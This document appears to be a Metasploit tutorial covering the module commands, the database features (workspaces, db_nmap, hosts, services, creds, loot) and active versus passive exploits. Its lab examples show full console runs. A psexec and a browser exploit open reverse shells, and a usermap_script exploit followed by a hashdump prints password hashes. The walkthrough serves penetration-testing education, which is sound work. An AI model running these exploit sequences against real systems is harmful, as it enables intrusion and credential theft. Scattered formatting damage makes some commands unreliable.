msf exploit**(**ms08_067_netapi**)** > show targets
Exploit targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
10 Windows 2003 SP1 Japanese **(**NO NX**)**
11 Windows 2003 SP2 English **(**NO NX**)**
12 Windows 2003 SP2 English **(**NX**)**
...snip...
You can use the show advanced command to see the most detailed information about the module.
msf exploit**(**ms08_067_netapi**)** > show advanced
Module advanced options:
Name : CHOST
Current Setting:
Description : The local client address
Name : CPORT
Current Setting:
Description : The local client port
...snip...
You can use the show encoders command to see the list of all encoders you can use in Metasploit.
msf > show encoders
Compatible Encoders
**===================**
Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/generic_sh good Generic Shell Variable Substitution Command Encoder
cmd/ifs low Generic **${**IFS**}** Substitution Command Encoder
cmd/printf_php_mq manual printf**(**1**)** via PHP magic_quotes Utility Command Encoder
generic/none normal The "none" Encoder
mipsbe/longxor normal XOR Encoder
mipsle/longxor normal XOR Encoder
php/base64 great PHP Base64 encoder
ppc/longxor normal PPC LongXOR Encoder
ppc/longxor_tag normal PPC LongXOR Encoder
sparc/longxor_tag normal SPARC DWORD XOR Encoder
x64/xor normal XOR Encoder
x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_utf8_tolower manual Avoid UTF8/tolower
x86/call4_dword_xor normal Call+4 Dword XOR Encoder
x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder
x86/context_stat manual stat**(**2**)**-based Context Keyed Payload Encoder
x86/context_time manual time**(**2**)**-based Context Keyed Payload Encoder
x86/countdown normal Single-byte XOR Countdown Encoder
x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder
x86/nonalpha low Non-Alpha Encoder
x86/nonupper low Non-Upper Encoder
x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit manual Single Static Bit
x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder
You can see the list of code generators called NOP Generator with the show nops command.
msf > show nops
NOP Generators
**==============**
Name Disclosure Date Rank Description
---- --------------- ---- -----------
armle/simple normal Simple
php/generic normal PHP Nop Generator
ppc/simple normal Simple
sparc/random normal SPARC NOP generator
tty/generic normal TTY Nop Generator
x64/simple normal Simple
x86/opty2 normal Opty2
x86/single_byte normal Single Byte
After your searches, you have decided to use a module. At this point, you can activate the module with the use command.
msf > use dos/windows/smb/ms09_001_write
msf auxiliary**(**ms09_001_write**)** > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
msf auxiliary**(**ms09_001_write**)** >
When you want to get help with a command during any operation, you can use the help command.
If you are using Metasploit framework software on Kali Operating System, you may have started to receive the following error at the start of msfconsole after the latest update. Using database in msfconsole is very useful for saving and reusing the scans you have made. The reason for this error is Postgresql 9.6 version installed in Kali with the latest update.
Failed to connect to the database: could not connect to server: Connection refused Is the server running on host "localhost" (::1) and accepting TCP/IP connections on port 5432? could not connect to server: Connection refused Is the server running on host "localhost" (127.0.0.1) and accepting TCP/IP connections on port 5432?
Postgresql 9.5 version used before Kali OS update listened to incoming requests on port 5432. Postgresql 9.6 started listening on port 5433 by default with the settings made in the conf file. Metasploit Framework is still trying to communicate with Postgresql on port 5432. Let’s check and fix this situation with the steps below and continue using our database where we left off.
service postgresql start
You can see the port number that Postgresql is currently listening to with the command below.
ss -lntp | grep post
You will probably get a result similar to the output below. If you see 5433 as the listening port, we can move on to the next step.
LISTEN 0 128 127.0.0.1:5433 *****:***** users:**((**"postgres",pid**=**2732,fd**=**6**))**
LISTEN 0 128 ::1:5433 :::***** users:**((**"postgres",pid**=**2732,fd**=**3**))**
Using the command below, let’s see which port is set in the /etc/postgresql/9.6/main/postgresql.conf settings file.
grep "port =" /etc/postgresql/9.6/main/postgresql.conf
port = 5433 # (change requires restart)
If you see 5433 instead of 5432 in the output, that means the problem is here.
Let’s make the port number 5432 with the following command.
sed -i 's/\(port = \)5433/\15432/' /etc/postgresql/9.6/main/postgresql.conf
Let’s restart the service and then set the msfdb startup. Now, you can connect to the database when Metasploit Framework starts with msfconsole.
service postgresql restart
msfdb reinit
Within the Metasploit Framework, the database feature offered with Postgresql support is very useful and records the scan results in one place. Recording the results found makes it easier to transfer information such as IP addresses, port numbers or Hash Dump etc. to exploits to be used in the next steps.
The following explanation is based on the Kali operating system and the commands have been tested in Kali.
First of all, postgresql should be started if it has not started yet.
root@kali:~# systemctl start postgresql
After starting postgresql, the database should be prepared for initial use. For this, we can use the ```msfdb init`` script.
root@kali:~# msfdb init
Creating database user 'msf'
Enter password **for **new role:
Enter it again:
Creating databases 'msf' and 'msf_test'
Creating configuration file **in** /usr/share/metasploit-framework/config/database.yml
Creating initial database schema
When msfconsole starts, first check the database connection with the db_status command.
msf > db_status
> postgresql connected to msf
After establishing the database connection, we can organize the work we will do by recording it in folders called Workspace. Just as we record our records in folders according to their subjects on normal computers, the same approach applies to msfconsole.
Simply giving the workspace command without any parameters lists the currently registered work folders. The currently active workspace is indicated with a * sign at the beginning.
msf > workspace
* default
msfu
lab1
lab2
lab3
lab4
msf >
The -a parameter is used to create a new Workspace, and the -d parameter is used to delete it. After the parameter, simply type the name of the Workspace you want to create or delete.
msf > workspace -a lab4
> Added workspace: lab4
msf >
msf > workspace -d lab4
> Deleted workspace: lab4
msf > workspace
After the existing folders are listed with the workspace command, if we want to move to a folder other than the active one, it is enough to write the name of the folder we want to move to after the workspace command as follows.
msf > workspace msfu
> Workspace: msfu
msf > workspace
default
* msfu
lab1
lab2
lab3
lab4
msf >
You can use the -h parameter for detailed help.
msf > workspace -h
Usage:
workspace List workspaces
workspace -v List workspaces verbosely
workspace **[**name] Switch workspace
workspace -a **[**name] ... Add workspace**(**s**)**
workspace -d **[**name] ... Delete workspace**(**s**)**
workspace -D Delete all workspaces
workspace -r Rename workspace
workspace -h Show this help information
msf >
Now the results you will obtain from the scans you will perform will be recorded in the active workspace. Now, as the next step, let’s look at other commands we can use regarding the database.
First, let’s look at what commands msfconsole provides us regarding the database. When we give the help command in msfconsole, the database commands are shown to us under a separate heading as follows.
msf > help
...snip...
Database Backend Commands
=========================
Command Description
------- -----------
credits List all credentials **in **the database
db_connect Connect to an existing database
db_disconnect Disconnect from the current database instance
db_export Export a file containing the contents of the database
db_import Import a scan result file **(**filetype will be auto-detected**)**
db_nmap Executes nmap and records the output automatically
db_rebuild_cache Rebuilds the database-stored module cache
db_status Show the current database status
hosts List all hosts **in **the database
loot List all loot **in **the database
notes List all notes **in **the database
services List all services **in **the database
vulns List all vulnerabilities **in **the database
workspace Switch between database workspaces
Let’s see the commands we viewed with the help command above with detailed examples.
This command allows us to import the scan results you made with nmap outside of msfconsole. You must have saved the output of the ```nmap`` scan in xml format.
In the example below, the file named /root/msfu/nmapScan is transferred to msfconsole. The IP addresses, ports, and all other result information will now be imported. The check was made with the hosts command given after the db_import command.
msf > db_import /root/msfu/nmapScan
> Importing 'Nmap XML' data
> Import: Parsing with 'Rex::Parser::NmapXMLStreamParser'
> Importing host 172.16.194.172
> Successfully imported /root/msfu/nmapScan
msf > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
172.16.194.172 00:0C:29:D1:62:80 Linux Ubuntu server
msf >
You can import nmap scan results from outside or inside with msfconsole You can perform an nmap scan without going out. The db_nmap command is used for this. Scans you perform with db_nmap will automatically be recorded in the active workspace.
msf > db_nmap -A 172.16.194.134
> Nmap: Starting Nmap 5.51SVN (<a href="http://nmap.org/">http://nmap.org</a> ) at 2012-06-18 12:36 EDT
> Nmap: Nmap scan report for 172.16.194.134
> Nmap: Host is up **(**0.00031s latency**)**.
> Nmap: Not shown: 994 closed ports
> Nmap: PORT STATE SERVICE VERSION
> Nmap: 80/tcp open http Apache httpd 2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.4
...snip...
> Nmap: HOP RTT ADDRESS
> Nmap: 1 0.31 ms 172.16.194.134
> Nmap: OS and Service detection performed. Please report any incorrect results at <a href="http://nmap.org/submit/">http://nmap.org/submit/</a> .
> Nmap: Nmap **done**: 1 IP address **(**1 host up**)** scanned **in **14.91 seconds
msf >
msf > hosts
Hosts
**=====**
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
172.16.194.134 00:0C:29:68:51:BB Microsoft Windows XP server
172.16.194.172 00:0C:29:D1:62:80 Linux Ubuntu server
msf >
You may want to export the scan results you made in a project you are working on and use them in your reports. There is a db_export command for this. When you give the -f parameter to the db_export command and the file name, the file you want is transferred to the external folder you specify. There are two different types of files in the export. All information in xml format or username and password etc. information in pwdump format.
First, let’s see the help information;
msf > db_export -h
Usage:
db_export -f **[**-a**]** **[**filename]
Format can be one of: xml, pwdump
**[**-] No output file was specified
Now let’s export the information in the workspace we are actively in in xml format.
msf > db_export -f xml /root/msfu/Exported.xml
> Starting export of workspace msfu to /root/msfu/Exported.xml **[** xml **]**...
> **>>** Starting export of report
> **>>** Starting export of hosts
> **>>** Starting export of events
> **>>** Starting export of services
> **>>** Starting export of credentials
> **>>** Starting export of websites
> **>>** Starting export of web pages
> **>>** Starting export of web forms
> **>>** Starting export of web vulns
> **>>** Finished export of report
> Finished export of workspace msfu to /root/msfu/Exported.xml **[** xml **]**...
The hosts command displays the scans performed so far. shows us the IP information, PORT information, etc. found as a result. First, let’s view the help information of the hosts command.
msf > hosts -h
Usage: hosts **[** options **]** **[**addr1 addr2 ...]
OPTIONS:
-a,--add Add the hosts instead of searching
-d,--delete Delete the hosts instead of searching
-c Only show the given columns **(**see list below**)**
-h,--help Show this help information
-u,--up Only show hosts which are up
-o Send output to a file **in **csv format
-O Order rows by specified column number
-R,--rhosts Set RHOSTS from the results of the search
-S,--search Search string to filter by
-i,--info Change the info of a host
-n,--name Change the name of a host
-m,--comment Change the comment of a host
-t,--tag Add or specify a tag to a range of hosts
When you use the hosts command alone, the stored information is organized and displayed in the columns listed below.
Available Columns: address, arch, comm, comments, created_at, cred_count, detected_arch, exploit_attempt_count, host_detail_count, info, mac, name, note_count, os_family, os_flavor, os_lang, os_name, os_sp, purpose, scope, service_count, state, updated_at, virtual_host, vuln_count, tags
Now, let’s display only the columns and information we will use. To do this, we must write the -c parameter and the column names we want. In the example below, it is requested that the address, os_flavor columns and information be displayed.
msf > hosts -c address,os_flavor
Hosts
**=====**
address os_flavor
------- ---------
172.16.194.134 XP
172.16.194.172 Ubuntu
We can transfer some information from the hosts list, where the information obtained from the scans we made is kept, to the modules we want to use. We displayed the columns we wanted with the hosts -c address,os_flavor command we used above. Now let’s search this list and search for the line that says “Ubuntu” in the results.
msf > hosts -c address,os_flavor -S Linux
Hosts
**=====**
address os_flavor
------- ---------
172.16.194.172 Ubuntu
msf >
Here we found the IP Address we will use. Now let’s go into a module and look at the variables the module needs.
msf auxiliary**(**tcp**)** > show options
Module options **(**auxiliary/scanner/portscan/tcp**)**:
Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
FILTER no The filter string **for **capturing traffic
INTERFACE no The name of the interface
PCAPFILE no The name of the PCAP capture file to process
PORTS 1-10000 yes Ports to scan **(**e.g. 22-25,80,110-900**)**
RHOSTS yes The target address range or CIDR identifier
SNAPLEN 65535 yes The number of bytes to capture
THREADS 1 yes The number of concurrent threads
TIMEOUT 1000 yes The socket connect timeout **in **milliseconds
In the output above, the RHOSTS variable is seen as empty. The Remote Host IP address needs to be entered here. Normally, you can enter the process with the command set RHOSTS 172.16.194.172. However, setting this in multiple modules will increase the possibility of making an error each time.
In this case, we can transfer the IP address we found with the search we made with the command hosts -c address,os_flavor -S Linux directly to the module we are in by adding the -R parameter to the end. As seen in the example below, the “Ubuntu” IP address is directly transferred to the tcp module.
msf auxiliary**(**tcp**)** > hosts -c address,os_flavor -S Linux -R
Hosts
**=====**
address os_flavor
------- ---------
172.16.194.172 Ubuntu
RHOSTS **=>** 172.16.194.172
msf auxiliary**(**tcp**)** > run
> 172.16.194.172:25 - TCP OPEN
> 172.16.194.172:23 - TCP OPEN
> 172.16.194.172:22 - TCP OPEN
> 172.16.194.172:21 - TCP OPEN
> 172.16.194.172:53 - TCP OPEN
> 172.16.194.172:80 - TCP OPEN
...snip...
> 172.16.194.172:5432 - TCP OPEN
> 172.16.194.172:5900 - TCP OPEN
> 172.16.194.172:6000 - TCP OPEN
> 172.16.194.172:6667 - TCP OPEN
> 172.16.194.172:6697 - TCP OPEN
> 172.16.194.172:8009 - TCP OPEN
> 172.16.194.172:8180 - TCP OPEN
> 172.16.194.172:8787 - TCP OPEN
> Scanned 1 of 1 hosts **(**100% complete**)**
> Auxiliary module execution completed
Without filtering the hosts list, we can also transfer all the available IP addresses to the active module. In this case, it will be sufficient to give only the -R parameter to the hosts command without entering any search expression.
msf auxiliary**(**tcp**)** > hosts -R
Hosts
**=====**
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
172.16.194.134 00:0C:29:68:51:BB Microsoft Windows XP server
172.16.194.172 00:0C:29:D1:62:80 Linux Ubuntu server
RHOSTS **=>** 172.16.194.134 172.16.194.172
msf auxiliary**(**tcp**)** > show options
Module options **(**auxiliary/scanner/portscan/tcp**)**:
Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
FILTER no The filter string **for **capturing traffic
INTERFACE no The name of the interface
PCAPFILE no The name of the PCAP capture file to process
PORTS 1-10000 yes Ports to scan **(**e.g. 22-25,80,110-900**)**
RHOSTS 172.16.194.134 172.16.194.172 yes The target address range or CIDR identifier
SNAPLEN 65535 yes The number of bytes to capture
THREADS 1 yes The number of concurrent threads
TIMEOUT 1000 yes The socket connect timeout **in **milliseconds
As you can see above, all IP addresses are transferred to RHOSTS. Although it is not time-consuming to enter a few IP addresses manually, you will definitely need this feature when you want to run a module on hundreds of IP addresses.
For example, you scanned a network and found 112 active devices and IP addresses. You want to try the smb_version module on all of them. At this point, the hosts -R command will make things much easier.
While the hosts command gives the IP and other information found in the scans, the services command lists the services running and discovered on these IP addresses. Of course, you must have performed a service and version scan with the db_nmap command.
First, let’s view the help information.
msf > services -h
Usage: services **[**-h**]** **[**-u**]** **[**-a**]** **[**-r **]** **[**-p >port1,port2>] **[**-s >name1,name2>] **[**-o **]** **[**addr1 addr2 ...]
-a,--add Add the services instead of searching
-d,--delete Delete the services instead of searching
-c Only show the given columns
-h,--help Show this help information
-s Search **for **a list of service names
-p Search **for **a list of ports
-r Only show **[**tcp|udp] services
-u,--up Only show services which are up
-o Send output to a file **in **csv format
-R,--rhosts Set RHOSTS from the results of the search
-S,--search Search string to filter by
The services command shows us the information organized in the following columns.
Available columns: created_at, info, name, port, proto, state, updated_at
Just like we search in the hosts command, we can search in the columns in services with the -c parameter and a specific expression with the -S parameter.
msf > services -c name,info 172.16.194.134
Services
**========**
hostname info
---- ---- ----
172.16.194.134 http Apache httpd 2.2.17 **(**Win32**)** mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.4 mod_perl/2.0.4 Perl/v5.10.1
172.16.194.134 msrpc Microsoft Windows RPC
172.16.194.134 netbios-ssn
172.16.194.134 http Apache httpd 2.2.17 **(**Win32**)** mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.4 mod_perl/2.0.4 Perl/v5.10.1
172.16.194.134 microsoft-ds Microsoft Windows XP microsoft-ds
172.16.194.134 mysql
msf > services -c name,info -S http
Services
**=========**
host name info
---- ---- ----
172.16.194.134 http Apache httpd 2.2.17 **(**Win32**)** mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.4 mod_perl/2.0.4 Perl/v5.10.1
172.16.194.134 http Apache httpd 2.2.17 **(**Win32**)** mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.4 mod_perl/2.0.4 Perl/v5.10.1
172.16.194.172 http Apache httpd 2.2.8 **(**Ubuntu**)** DAV/2
172.16.194.172 http Apache Tomcat/Coyote JSP engine 1.1
msf > services -c info,name -p 445
Services
**=========**
host info name
---- ---- ----
172.16.194.134 Microsoft Windows XP microsoft-ds microsoft-ds
172.16.194.172 Samba smbd 3.X workgroup: WORKGROUP netbios-ssn
msf > services -c port,proto,state -p 70-81
Services
**========**
host port proto state
---- ---- ----- -----
172.16.194.134 80 tcp open
172.16.194.172 75 tcp closed
172.16.194.172 71 tcp closed
172.16.194.172 72 tcp closed
172.16.194.172 73 tcp closed
172.16.194.172 74 tcp closed
172.16.194.172 70 tcp closed
172.16.194.172 76 tcp closed
172.16.194.172 77 tcp closed
172.16.194.172 78 tcp closed
172.16.194.172 79 tcp closed
172.16.194.172 80 tcp open
172.16.194.172 81 tcp closed
In a few examples above, we searched for a specific expression with -S (capital S). The -s parameter also makes it particularly easy to search the services list.
msf > services -s http -c port 172.16.194.134
Services
**========**
host port
---- ----
172.16.194.134 80
172.16.194.134 443
msf > services -S Unr
Services
**========**
host port proto name state info
---- ---- ----- ---- ----- ----
172.16.194.172 6667 tcp irc open Unreal ircd
172.16.194.172 6697 tcp irc open Unreal ircd
Both hosts and also printing the search results we made on the information recorded in the services lists to the screen. You can also export as a comma-separated file in SV format. Here are a few examples.
msf > services -s http -c port 172.16.194.134 -o /root/msfu/http.csv
> Wrote services to /root/msfu/http.csv
msf > hosts -S Linux -o /root/msfu/linux.csv
> Wrote hosts to /root/msfu/linux.csv
msf > cat /root/msfu/linux.csv
> exec: cat /root/msfu/linux.csv
address,mac,name,os_name,os_flavor,os_sp,purpose,info,comments
"172.16.194.172","00:0C:29:D1:62:80","","Linux","Debian","","server","",""
msf > cat /root/msfu/http.csv
> exec:cat /root/msfu/http.csv
host,port
"172.16.194.134","80"
"172.16.194.134","443"
The creds command, similar to the hosts and services commands, shows us the user information and passwords obtained in the scans. When you give the creds command without entering any additional parameters, all registered user information is listed.
msf > creds
Credentials
**============**
host port user pass type active?
---- ---- ---- ---- ---- -------
> Found 0 credentials.
Just as the results found in searches made with the db_nmap command are kept in the hosts and services tables, the information you obtain when you use any username and password finding module is also kept in the creds table. Let’s see an example. In this example, the mysql_login module is run and an attempt is made to log in to the MySql service running at the 172.16.194.172 IP address. When successful, the successful username and password information is recorded in the creds table for later use.
msf auxiliary**(**mysql_login**)** > run
> 172.16.194.172:3306 MYSQL - Found remote MySQL version 5.0.51a
> 172.16.194.172:3306 MYSQL - **[**1/2] - Trying username:'root' with password:''
> 172.16.194.172:3306 - SUCCESSFUL LOGIN 'root' : ''
> Scanned 1 of 1 hosts **(**100% complete**)**
> Auxiliary module execution completed
msf auxiliary**(**mysql_login**)** > creds
Credentials
**===========**
host port user pass type active?
---- ---- ---- ---- ---- -------
172.16.194.172 3306 root password true
>Found 1 credential.
msf auxiliary**(**mysql_login**)** >
When you log in to a system, you can also transfer the username and password information you found yourself without using a module to the creds table for later use, using the format in the example below
msf > creds -a 172.16.194.134 -p 445 -u Administrator -P 7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::
> Time: 2012-06-20 20:31:42 UTC Credential: host**=**172.16.194.134 port**=**445 proto**=**tcp sname**=** type**=**password user**=**Administrator pass**=**7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e::: active**=**true
msf > credits
Credentials
**===========**
host port user pass type active?
---- ---- ---- ---- ---- ---- ----
172.16.194.134 445 Administrator 7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e::: password true
> Found 1 credential.
In a system that is logged in, the hash table is usually first extracted by performing hashdump. Here, with the loot command, the information of the hash values obtained as a result of the scan can be seen. In the example below, loot help is displayed.
msf > loot -h
Usage: loot
Info: loot **[**-h**]** **[**addr1 addr2 ...] **[**-t **]**
Add: loot -f **[**fname] -i **[**info] -a **[**addr1 addr2 ...] **[**-t **[**type**]**
Del: loot -d **[**addr1 addr2 ...]
-a,--add Add loot to the list of addresses, instead of listing
-d,--delete Delete *****all***** loot matching host and type
-f,--file File with contents of the loot to add
-i,--info Info of the loot to add
-t Search **for **a list of types
-h,--help Show this help information
-S,--search Search string to filter by
Then, using the usermap_script module, a session is opened on the opposite system and the hash values for the opened session are found with the hashdump module. If successful, the found hash values are recorded in the loot table for later use.
msf exploit**(**usermap_script**)** > exploit
> Started reverse double handler
> Accepted the first client connection...
> Accepted the second client connection...
> Command: echo 4uGPYOrars5OojdL;
> Writing to socket A
> Writing to socket B
> Reading from sockets...
> Reading from socket B
> B: "4uGPYOrars5OojdL\r "
>Matching...
> A is input...
> Command shell session 1 opened **(**172.16.194.163:4444 -> 172.16.194.172:55138**)** at 2012-06-27 19:38:54 -0400
^Z
Background session 1? **[**y/N] y
msf exploit**(**usermap_script**)** > use post/linux/gather/hashdump
msf post**(**hashdump**)** > show options
Module options **(**post/linux/gather/hashdump**)**:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.
msf post**(**hashdump**)** > sessions -l
Active sessions
**===============**
Id Type Information Connection
-- ---- ----------- ----------
1 shell unix 172.16.194.163:4444 -> 172.16.194.172:55138 **(**172.16.194.172**)**
msf post**(**hashdump**)** > run
**[**+] root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:0:0:root:/root:/bin/bash
**[**+] sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:3:3:sys:/dev:/bin/sh
**[**+] klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:103:104::/home/klog:/bin/false
**[**+] msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
**[**+] postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
**[**+] user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:1001:1001:just a user,111,,:/home/user:/bin/bash
**[**+] service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:1002:1002:,,,:/home/service:/bin/bash
**[**+] Unshadowed Password File: /root/.msf4/loot/20120627193921_msfu_172.16.194.172_linux.hashes_264208.txt
> Post module execution completed
To see the hash values stored in the database loot Just give the command.
msf post**(**hashdump**)** > loot
loot
**====**
host service type name content info path
---- ------- ---- ---- ------- ---- ----
172.16.194.172 linux.hashes unshadowed_passwd.pwd text/plain Linux Unshadowed Password File /root/.msf4/loot/20120627193921_msfu_172.16.194.172_linux.hashes_264208.txt
172.16.194.172 linux.passwd passwd.tx text/plain Linux Passwd File /root/.msf4/loot/20120627193921_msfu_172.16.194.172_linux.passwd_953644.txt
172.16.194.172 linux.shadow shadow.tx text/plain Linux Password Shadow File /root/.msf4/loot/20120627193921_msfu_172.16.194.172_linux.shadow_492948.txt ```
In this article, we tried to explain the `database` related commands shown in the `help` command given in `msfconsole`.
```bash
Database Backend Commands
**=========================**
Command Description
------- -----------
credits List all credentials in the database
db_connect Connect to an existing database
db_disconnect Disconnect from the current database instance
db_export Export a file containing the contents of the database
db_import Import a scan result file (filetype will be auto-detected)
db_nmap Executes nmap and records the output automatically
db_rebuild_cache Rebuilds the database-stored module cache
db_status Show the current database status
hosts List all hosts in the database
loot List all loot in the database
notes List all notes in the database
services List all services in the database
vulns List all vulnerabilities in the database
workspace Switch between database workspaces
You may think that we left out the vulns command. It is possible to guess more or less what the vulns command does. The article is long enough. I leave the vulns command to you
Within the Metasploit Framework, all exploit modules are grouped as active and passive.
Active exploits will run on a specific target and continue to run until the process is completed. They stop running when they encounter any error.
For example, the Brute-force module runs until a shell command line is opened on the target computer and stops when it is finished. Since their processes can take a long time to complete, they can be sent to the background using the -j parameter.
In the example below, you can see that the ms08_067_netapi exploit is started and sent to the background.
msf exploit**(**ms08_067_netapi**)** > exploit -j
> Exploit running as background job.
msf exploit**(**ms08_067_netapi**)** >
In this example, a target computer (192.168.1.100) whose information was obtained through prior discovery is shown setting the necessary variables and starting to work. The psexec exploit and the reverse_tcp payload module are used to open a shell on the target computer.
msf > use exploit/windows/smb/psexec
msf exploit**(**psexec**)** > set RHOST 192.168.1.100
RHOST **=>** 192.168.1.100
msf exploit**(**psexec**)** > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD **=>** windows/shell/reverse_tcp
msf exploit**(**psexec**)** > set LHOST 192.168.1.5
LHOST **=>** 192.168.1.5
msf exploit**(**psexec**)** > set LPORT 4444
LPORT **=>** 4444
msf exploit**(**psexec**)** > set SMBUSER victim
SMBUSER **=>** victim
msf exploit**(**psexec**)** > set SMBPASS s3cr3t
SMBPASS **=>** s3cr3t
msf exploit**(**psexec**)** > exploit
> Connecting to the server...
> Started reverse handler
> Authenticating as user 'victim'...
> Uploading payload...
> Created \hikmEeEM.exe...
> Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...
> Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...
> Obtaining a service manager handle...
> Creating a new service **(**ciWyCVEp - "MXAVZsCqfRtZwScLdexnD"**)**...
> Closing service handle...
> Opening service...
> Starting the service...
>Removing the service...
> Closing service handle...
> Deleting \hikmEeEM.exe...
> Sending stage **(**240 bytes**)**
> Command shell session 1 opened **(**192.168.1.5:4444 -> 192.168.1.100:1073**)**
Microsoft Windows XP **[**Version 5.1.2600]
**(**C**)** Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Passive Exploits run passively on the local computer (our own computer) and remain listening. They wait for the target computer to somehow connect to the local computer.
Passive exploits almost always focus on clients such as Web browsers, FTP, etc. They can also be used in connections from files sent via e-mail. When a passive exploit runs, it starts waiting. When a user clicks on a link on the site or performs an action, that’s when the passive exploit in the listening receives the signal and opens a shell on the target.
You can see the list of exploits running in the background and listening by giving the -l parameter to the sessions command. You can use the -i parameter to go to the desired ID numbered process from the list.
msf exploit**(**ani_loadimage_chunksize**)** > sessions -l
Active sessions
**================**
Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.1.5:52647 -> 192.168.1.100:4444
msf exploit**(**ani_loadimage_chunksize**)** > sessions -i 1
> Starting interaction with 1...
meterpreter >
In the example below, a user is expected to enter a Web page using the loadimage_chunksize exploit and reverse_tcp payload. The LHOST variable indicates the IP address of the computer that will listen locally, and the LPORT indicates the port number that will listen on the local computer.
msf > use exploit/windows/browser/ani_loadimage_chunksize
msf exploit**(**ani_loadimage_chunksize**)** > set URIPATH /
URIPATH **=>** /
msf exploit**(**ani_loadimage_chunksize**)** > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD **=>** windows/shell/reverse_tcp
msf exploit**(**ani_loadimage_chunksize**)** > set LHOST 192.168.1.5
LHOST **=>** 192.168.1.5
msf exploit**(**ani_loadimage_chunksize**)** > set LPORT 4444
LPORT **=>** 4444
msf exploit**(**ani_loadimage_chunksize**)** > exploit
> Exploit running as background job.
> Started reverse handler
> Using URL: <a href="http://0.0.0.0:8080/">http://0.0.0.0:8080/</a>
> Local IP: <a href="http://192.168.1.5:8080/">http://192.168.1.5:8080/</a>
> Server started.
msf exploit**(**ani_loadimage_chunksize**)** >
> Attempting to exploit ani_loadimage_chunksize
> Sending HTML page to 192.168.1.100:1077...
> Attempting to exploit ani_loadimage_chunksize
> Sending Windows ANI LoadAniIcon**()** Chunk Size Stack Overflow **(**HTTP**)** to 192.168.1.100:1077...
> Sending stage **(**240 bytes**)**
> Command shell session 2 opened **(**192.168.1.5:4444 -> 192.168.1.100:1078**)**
msf exploit**(**ani_loadimage_chunksize**)** > sessions -i 2
> Starting interaction with 2...
Microsoft Windows XP **[**Version 5.1.2600]
**(**C**)** Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\victim\Desktop>
You can send us other topics you want to be explained.